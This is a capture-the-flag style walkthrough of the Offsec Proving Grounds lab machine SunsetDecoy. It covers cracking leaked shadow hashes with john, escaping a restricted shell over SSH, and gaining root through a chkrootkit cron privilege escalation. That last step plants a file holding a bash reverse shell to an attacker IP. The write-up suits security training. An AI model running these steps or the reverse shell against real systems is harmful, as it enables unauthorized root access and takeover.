Offsec Proving Grounds - SunsetDecoy Walkthrough

# Offsec Proving Grounds - SunsetDecoy Walkthrough #### Machine Details #### Name: SunsetDecoy #### IP address: 192.168.66.85 #### Difficulty: Easy #### Points: 5 --- ## In the beginning As always, I started with an nmap scan and the result is shown below: ![](https://i.imgur.com/WhUfmeY.png) There seems to be two services running; SSH on port 22 and HTTP on port 80. From the script enumeration, the HTTP service is serving a file save.zip. So I proceeded to visit the IP address in the browser and downloaded the save.zip file. ![](https://i.imgur.com/DhFKkUS.png) Unzipping this file, it contains some Linux files such as passwd, shadow, etc. ![](https://i.imgur.com/3iFDtQo.png) ## Come out of the shadows Since both the passwd and shadow files are provided, I used the unshadow command to merge then and cracked the hashes with john. I was able to find the password to a long string named user. ``` unshadow passwd shadow > crack.txt john crack --wordlist=/usr/share/wordlists/rockyou.txt Found password 296640a3b825115a47b68fc44501c82:server ``` ## We're in! Now I was able to log into the box via SSH but I was greeted with a restricted shell. ![](https://i.imgur.com/l9L7EjC.png) ### Oh my! Not another jail escape To breakout of this shell, I used the following command: ``` ssh 296640a3b825115a47b68fc44501c82@192.168.66.85 -t "bash --noprofile" ``` but still could not run commands. This was because the $PATH was set to the user's home directory and the commands I was running were not in that directory. To fix this, I had to export the correct path to the binaries. And then I could run commands. ``` export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin ``` ![](https://i.imgur.com/aOZ5OVr.png) As usual, I first checked if I could run commands with sudo on the box but turns out the user is not part of the sudoers file. ![](https://i.imgur.com/hAmCyco.png) ### I see you, honeypot In the user's home directory, one of the files that caught my attention was the honeypot.decoy file. To know what the file does, I ran it and tried some of its functionalities. ![](https://i.imgur.com/p1l6wyf.png) Most of the functionalities are basic Linux commands. The Launch an AV scan function says a scan will be ran. So my thought process was to select that option and monitor the process to see what was being performed. To monitor the process, I opened another SSH session, I uploaded [pspy64](https://github.com/DominicBreuker/pspy/releases) (since the box is x86_64) to the box, ran it in one session and ran the honeypot.decoy file in the other. ![](https://i.imgur.com/NkahbRj.png) ![](https://i.imgur.com/qmbUiZK.png) ## What's going on, processes From the processes, I quickly noticed there is a cron task running the chkrookit tool as root. Checking the chkrookit version in use shows that it is vulnerable to a [Local Privilege Escalation](https://www.exploit-db.com/exploits/33899) exploit and it explains the procedure to follow to carry out the exploit. What I needed to do was to create a file with the name update inside the /tmp directory, make it executable and wait for the cron task to run it. ``` #!/bin/bash bash -i >& /dev/tcp/192.168.49.66/9001 0>&1 ``` ![](https://i.imgur.com/onDzfYV.png) When the cron task ran, I got a shell as root. ![](https://i.imgur.com/uref7ts.png) BOOM! ###### tags: `offsec proving grounds` `sunsetdecoy` `chkrootkit` `local privilege escalation` `password cracking` `unshadow` `bypassing restricted shells`